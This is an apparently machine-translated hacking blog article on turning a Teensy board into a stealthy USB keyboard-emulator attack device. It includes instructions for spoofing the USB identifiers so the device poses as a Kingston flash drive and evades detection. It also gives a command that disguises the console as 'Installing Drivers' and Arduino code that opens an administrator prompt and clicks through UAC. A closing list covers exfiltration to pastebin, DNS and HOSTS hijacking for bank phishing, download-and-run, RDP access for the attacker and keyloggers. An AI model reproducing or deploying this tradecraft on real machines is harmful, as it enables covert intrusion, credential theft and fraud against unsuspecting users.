Evil USB HID-emulator or just Peensy

An interesting attack vector is the use of USB HID keyboard (and mouse) emulators in a standard USB flash drive. And if autofun.inf on a flash drive, we have already learned how to search and destroy, then with HID emulators everything is so bad.

For those who are not familiar with this topic yet, I recommend reading the “ Battle HID-emulator on Arduino ” habrostaty for a start. Here I will not touch on the issues of installing and configuring the Arduino programming environment, but rather a little bit about the advanced use of Peensy (Pentest + Teensy).

Iron

The first thing to start with is to buy a Teensy MicroSD adapter and a DIP switch. The first is needed in order for Peensy to emulate not only the keyboard, but also the flash drive itself. Yes, and store ready-made scripts on a flash drive is more convenient than “stuffing” them again each time. DIP switch will help in the field to choose the desired load, or, for example, switch between 32-bit and 64-bit version of the script.
')
The finished Peensy will look something like this:



You can immediately buy a ready-to-work rubber duck .

Hiding Peensy

Some defenses have already learned to detect and block Peensy. But they do it on a bunch of VendorID & ProductID, which we can change in the Arduino programming environment.
We are looking for files \ arduino-1.0.1-windows \ arduino-1.0.1 \ hardware \ teensy \ cores \ usb_hid \ usb_private.h and change the corresponding parameters to the parameters of the Kingston flash drive , for example. In addition, we scroll the file further and change the STR_PRODUCT parameter from “Teensy” to “Kingston DataTraveler 2Gb”. Now, when installing the Peensy drivers, we can only be given a composite device driver instead of the usual, storage device. But who will pay attention to this?

Peensy's main job is in the cmd window. By adding a pair of keys, we can make the command window much less noticeable:

cmd /T:01 /K "@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers" 

Enable feedback

A significant drawback of the Teensy was the use of a giant delay in the beginning of the device operation, which was necessary for the initial installation of drivers. In the Kautilya framework, the initial default delay is 25 seconds. For 25 seconds, you can even have time to throw the "necessary documents" from a colleague on the "flash drive" and turn it off. And if the driver is installed, say, in 30 seconds, then instead of the CMD window, Peensy will put his combat script directly into the open Word window.

The lack of feedback and a huge delay for the initial installation of drivers significantly reduced the effectiveness of Peensy ... until you came up with the use of NumLock for this purpose!

When you press the NumLock key, the system transmits a command to the keyboard to light the corresponding diode. This feature can be used for feedback in the Peensy code.

Change the 25 second delay to check the system response to pressing the Peensy NumLock key.

 int ledkeys(void) {return int(keyboard_leds);} bool is_num_on(void) {return ((ledkeys() & 1) == 1) ? true : false;} void wait_for_drivers() { bool numLockTrap = is_num_on(); while(numLockTrap == is_num_on()) //  NumLock      { Keyboard.set_key1(KEY_NUM_LOCK); Keyboard.send_now(); // NumLock delay(200); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); // delay(200); } } 

Now we can check whether PowerShell is installed on the system.
Make sure the NumLock is off

  if (is_num_on()) { delay(500); Keyboard.set_key1(KEY_NUM_LOCK); Keyboard.send_now(); delay(700); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); delay(500); } 

Turn it on via PowerShell (cmd must be open)

 Keyboard.println("echo Set WshShell = WScript.CreateObject(\"WScript.Shell\"): WshShell.SendKeys \"{NUMLOCK}\"' > numlock.vbs"); delay(400); Keyboard.println("cscript numlock.vbs"); delay(400); 

Now it remains only to check the status of NumLock using is_num_on () to understand whether the script has worked or not.

NumLock checks (as well as Caps and Scroll lock) can be inserted into any part of the Peensy code. For example, you can check whether the user has removed the focus from the CMD window, whether the script has worked correctly, etc.

Run the command prompt with administrator rights

To launch the command prompt with administrator rights, you must click WinKey, type in “cmd”, press Ctrl + Shift + Enter and in the UAC window that appears, press “left” + Enter.

In Peensy code, it will look like this:

  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); Keyboard.send_now(); // WinKey delay(400); Keyboard.set_modifier(0); Keyboard.send_now(); // delay(100); Keyboard.print("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers\" "); // cmd delay(400); Keyboard.set_modifier(MODIFIERKEY_CTRL); Keyboard.send_now(); Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT); Keyboard.send_now(); Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); // cmd    delay(400); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); // ctrl+shift+enter delay(400); Keyboard.set_key1(KEY_LEFT); Keyboard.send_now(); //  delay(100); Keyboard.set_key1(0); Keyboard.send_now(); Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); // enter delay(100); Keyboard.set_key1(0); Keyboard.send_now(); 

This code will work in 2 seconds. You can try to reduce to 1.

Most of the workloads for Peensy require administrative rights, however there are some interesting scripts (for example, a keylogger with a link to all keystrokes pressed on pastebin), which will quietly run with user rights.

If habrayuzmera will be interested in this topic, I will analyze some interesting scripts in the following articles. However, the scripts can be downloaded and studied independently from the blog of the author Kautilya Nikhil Mittal .

Conclusion

The spectrum and capabilities of Peensy are growing every day. On a fast, modern computer, Peensy is able to shed its load in seconds, making it discreet enough to not be detected by most PC users.

Having feedback using the NumLock and / or ScrollLock keys allows you to create adaptive and fault-tolerant loads. Using the same PowerShell greatly expands the possibilities of the attacker.

Using PowerShell, for example, you can:
- send information about the system / contents of the specified file to pastebin.com using the hidden Internet Explorer window;
- change the DNS server (which will allow to control the Internet activity of the user);
- download and run the executable file;
- edit the HOSTS file (it is necessary to substitute web pages, for example, the client bank);
- enable the RDP protocol and configure it to connect the attacker;
- install a script keylogger or sniffer;
- raise the wifi access point with the specified parameters, etc.

Here is a small demonstration of the work of Teensy on a real machine with a load in the form of a notepad with admin rights.

What else to read?

• Advanced teensy penetration testing payloads ;
• Nikhil Mittal blog ;
• Battle HID-emulator for Arduino .